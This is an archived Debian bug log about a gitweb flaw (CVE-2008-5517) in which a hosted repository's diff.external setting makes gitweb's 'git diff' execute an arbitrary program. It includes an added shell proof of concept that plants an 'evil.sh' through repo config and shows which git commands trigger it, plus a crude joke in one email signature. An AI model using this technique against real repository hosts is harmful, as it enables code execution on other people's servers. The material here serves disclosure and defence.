Debian Bug report logs - #512330
gitweb: do not run "git diff" that is Porcelain


Package: gitweb; Maintainer for gitweb is Gerrit Pape <pape@smarden.org>; Source for gitweb is src:git.

Reported by: Frédéric Brière <fbriere@fbriere.net>

Date: Mon, 19 Jan 2009 19:00:01 UTC

Severity: grave

Tags: security

Found in version git-core/1:1.5.4-1

Fixed in versions 1:1.6.0.6-1, git-core/1:1.5.6.5-2, 1:1.4.4.4-4+etch1

Done: Florian Weimer <fw@deneb.enyo.de>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Debian Security Team <team@security.debian.org>, Debian Testing Security Team <secure-testing-team@lists.alioth.debian.org>, Gerrit Pape <pape@smarden.org>:
Bug#512330; Package gitweb. (Mon, 19 Jan 2009 19:00:03 GMT)

Acknowledgement sent to Frédéric Brière <fbriere@fbriere.net>:
New Bug report received and forwarded. Copy sent to Debian Security Team <team@security.debian.org>, Debian Testing Security Team <secure-testing-team@lists.alioth.debian.org>, Gerrit Pape <pape@smarden.org>. (Mon, 19 Jan 2009 19:00:03 GMT)

Message #5 received at submit@bugs.debian.org:

From: Frédéric Brière <fbriere@fbriere.net>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: gitweb: do not run "git diff" that is Porcelain
Date: Mon, 19 Jan 2009 13:56:44 -0500
Package: gitweb
Version: 1.5.4
Severity: grave
Tags: security
Justification: user security hole

This bug report covers CVE-2008-5517.

Now, correct me if I'm wrong, Gerrit, but this doesn't have anything to
do with shell metacharacters, despite what the CVE claims.

This actually relates to the ability to run an external diff command
(diff.external).  If Alice maintains a repo being hosted by Bob, she
could therefore trick gitweb into invoking any executable she chooses.
This is bad if gitweb is being run as a privileged user, or if Alice is
not meant to have executing rights on the server.

This has been fixed in 1:1.6.0.6-1, already in experimental.  It has
also been fixed upstream in 1.5.6.6, although the patch[*] could be
cleanly applied to lenny's 1.5.6.5 as well.

[*] <http://repo.or.cz/w/git.git?a=commitdiff;h=dfff4b7aa42de7e7d58caeebe2c6128449f09b76;hp=872354dcb3ce5f34f7ddb12d2c89d26a1ea4daf0>

Support for diff.external was added in 1.5.4, so this bug does not apply
to sarge.


-- System Information:
Debian Release: 5.0
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.26 (SMP w/1 CPU core)
Locale: LANG=en_CA.UTF-8, LC_CTYPE=en_CA.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
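
The mechanism Frédéric describes above, reproduced as an added example (this is not code from gitweb, git or the Debian package). It builds a throwaway repository whose own config sets diff.external, then shows that the Porcelain command "git diff" executes that program while "git diff --no-ext-diff" and the plumbing command "git diff-tree" do not, which is the distinction the upstream fix title refers to. It needs a git binary on PATH and reflects the behaviour of current git; the evil.sh script and the "pwned" marker file are hypothetical stand-ins for whatever Alice would really want run on Bob's server.

```shell
#!/bin/sh
# Added example for Debian bug #512330; not gitweb's, git's or Debian's code.
# Shows that a repository's own config can name a program in diff.external
# and that Porcelain "git diff" runs it, while "git diff --no-ext-diff" and
# plumbing "git diff-tree" do not. Needs git on PATH. The evil.sh name and
# the "pwned" marker are hypothetical.

# Build a throwaway repo with two commits whose .git/config points
# diff.external at a script that only drops a marker file, so we can tell
# whether it was executed. Prints the repository path on success.
setup_repo() {
    dir=$(mktemp -d) || return 1
    (
        cd "$dir" || exit 1
        # Isolate from the real user's global and system git config.
        export HOME="$dir" GIT_CONFIG_NOSYSTEM=1
        git init -q . || exit 1
        printf '#!/bin/sh\ntouch "%s/pwned"\n' "$dir" > evil.sh
        chmod +x evil.sh
        # This is the line Alice controls in a repo she pushes to Bob's host.
        git config diff.external "$dir/evil.sh"
        echo one > f && git add f &&
            git -c user.name=alice -c user.email=alice@example.invalid \
                commit -q -m first || exit 1
        echo two > f && git add f &&
            git -c user.name=alice -c user.email=alice@example.invalid \
                commit -q -m second || exit 1
    ) || return 1
    echo "$dir"
}

# Run "git <args>" inside a fresh repo and report whether diff.external
# fired. Echoes "yes" or "no" and always returns 0 (safe under set -e).
ext_diff_ran() {
    dir=$(setup_repo) || { echo no; return 0; }
    ( cd "$dir" && HOME="$dir" GIT_CONFIG_NOSYSTEM=1 \
        git "$@" >/dev/null 2>&1 ) || true
    if [ -e "$dir/pwned" ]; then echo yes; else echo no; fi
    rm -rf "$dir"
}

# Usage: "sh this_script.sh demo". The first command is the hole gitweb had;
# the other two produce the same patch without trusting the repo's config.
if [ "${1:-}" = demo ]; then
    echo "git diff HEAD~1 HEAD               -> $(ext_diff_ran diff HEAD~1 HEAD)"
    echo "git diff --no-ext-diff HEAD~1 HEAD -> $(ext_diff_ran diff --no-ext-diff HEAD~1 HEAD)"
    echo "git diff-tree -p HEAD~1 HEAD       -> $(ext_diff_ran diff-tree -p HEAD~1 HEAD)"
fi
```

The point for anyone writing a web front end over repositories they do not control: the program named in diff.external runs as the user gitweb runs as, typically the web server account, so the defence has to be in the command the front end invokes (plumbing, or an explicit --no-ext-diff), not in auditing each hosted repository's config.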




Bug no longer marked as found in version 1.5.4. Request was from Frédéric Brière <fbriere@fbriere.net> to control@bugs.debian.org. (Mon, 19 Jan 2009 19:12:03 GMT)

Bug marked as found in version 1:1.5.4. Request was from Frédéric Brière <fbriere@fbriere.net> to control@bugs.debian.org. (Mon, 19 Jan 2009 19:12:04 GMT)

Bug marked as fixed in version 1:1.6.0.6-1. Request was from Frédéric Brière <fbriere@fbriere.net> to control@bugs.debian.org. (Mon, 19 Jan 2009 19:18:04 GMT)

Bug no longer marked as found in version 1:1.5.4. Request was from Frédéric Brière <fbriere@fbriere.net> to control@bugs.debian.org. (Mon, 19 Jan 2009 19:24:14 GMT)

Bug marked as found in version git-core/1:1.5.4. Request was from Frédéric Brière <fbriere@fbriere.net> to control@bugs.debian.org. (Mon, 19 Jan 2009 19:24:15 GMT)

Information forwarded to debian-bugs-dist@lists.debian.org, Gerrit Pape <pape@smarden.org>:
Bug#512330; Package gitweb. (Mon, 19 Jan 2009 19:33:04 GMT)

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Gerrit Pape <pape@smarden.org>. (Mon, 19 Jan 2009 19:33:05 GMT)

Message #20 received at 512330@bugs.debian.org:

From: Florian Weimer <fw@deneb.enyo.de>
To: Frédéric Brière <fbriere@fbriere.net>
Cc: 512330@bugs.debian.org
Subject: Re: Bug#512330: gitweb: do not run "git diff" that is Porcelain
Date: Mon, 19 Jan 2009 20:30:20 +0100
* Frédéric Brière:

> This bug report covers CVE-2008-5517.
>
> Now, correct me if I'm wrong, Gerrit, but this doesn't have anything to
> do with shell metacharacters, despite what the CVE claims.
>
> This actually relates to the ability to run an external diff command
> (diff.external).

Nope, this is a different bug.  The diff.external issue hasn't
received a CVE yet, AFAIK.




Information forwarded to debian-bugs-dist@lists.debian.org, Gerrit Pape <pape@smarden.org>:
Bug#512330; Package gitweb. (Mon, 19 Jan 2009 19:42:07 GMT)

Acknowledgement sent to Frédéric Brière <fbriere@fbriere.net>:
Extra info received and forwarded to list. Copy sent to Gerrit Pape <pape@smarden.org>. (Mon, 19 Jan 2009 19:42:07 GMT)

Message #25 received at 512330@bugs.debian.org:

From: Frédéric Brière <fbriere@fbriere.net>
To: Florian Weimer <fw@deneb.enyo.de>
Cc: 512330@bugs.debian.org
Subject: Re: Bug#512330: gitweb: do not run "git diff" that is Porcelain
Date: Mon, 19 Jan 2009 14:40:33 -0500
On Mon, Jan 19, 2009 at 08:30:20PM +0100, Florian Weimer wrote:
> > This bug report covers CVE-2008-5517.
> 
> Nope, this is a different bug.  The diff.external issue hasn't
> received a CVE yet, AFAIK.

Strange, the first two links of the mitre.org page seem to imply
otherwise.

Could you tell me where to find more information about this bug, then?
All my searches have turned up is the diff.external issue, and there
doesn't seem to be any bug report attached to this CVE.


-- 
<StevenK> I can usually supress the feelings that tell me to crash
          tackle a girl into the bushes




Bug no longer marked as found in version git-core/1:1.5.4. Request was from Frédéric Brière <fbriere@fbriere.net> to control@bugs.debian.org. (Mon, 19 Jan 2009 19:51:02 GMT)

Bug marked as found in version 1:1.5.4-1. Request was from Frédéric Brière <fbriere@fbriere.net> to control@bugs.debian.org. (Mon, 19 Jan 2009 19:51:02 GMT)

Information forwarded to debian-bugs-dist@lists.debian.org, Gerrit Pape <pape@smarden.org>:
Bug#512330; Package gitweb. (Mon, 19 Jan 2009 20:15:06 GMT)

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Gerrit Pape <pape@smarden.org>. (Mon, 19 Jan 2009 20:15:06 GMT)

Message #34 received at 512330@bugs.debian.org:

From: Florian Weimer <fw@deneb.enyo.de>
To: Frédéric Brière <fbriere@fbriere.net>
Cc: 512330@bugs.debian.org
Subject: Re: Bug#512330: gitweb: do not run "git diff" that is Porcelain
Date: Mon, 19 Jan 2009 21:14:45 +0100
* Frédéric Brière:

> On Mon, Jan 19, 2009 at 08:30:20PM +0100, Florian Weimer wrote:
>> > This bug report covers CVE-2008-5517.
>> 
>> Nope, this is a different bug.  The diff.external issue hasn't
>> received a CVE yet, AFAIK.
>
> Strange, the first two links of the mitre.org page seem to imply
> otherwise.

Yes, and Novell's SRPM matches the bug distribution.  I would say,
let's use CVE-2008-5517 for this issue.

> Could you tell me where to find more information about this bug, then?

There's another set of bugs, which has received CVE-2008-5516 and was
silently fixed by upstream quite some time ago.




Bug marked as fixed in version 1:1.5.6.5-2, send any further explanations to Frédéric Brière <fbriere@fbriere.net> Request was from Florian Weimer <fw@deneb.enyo.de> to control@bugs.debian.org. (Tue, 20 Jan 2009 06:48:02 GMT)

Bug marked as fixed in version 1:1.4.4.4-4+etch1, send any further explanations to Frédéric Brière <fbriere@fbriere.net> Request was from Florian Weimer <fw@deneb.enyo.de> to control@bugs.debian.org. (Tue, 20 Jan 2009 06:48:03 GMT)

Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Tue, 17 Feb 2009 07:36:13 GMT)



Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Apr 16 08:07:06 2014; Machine Name: buxtehude.debian.org
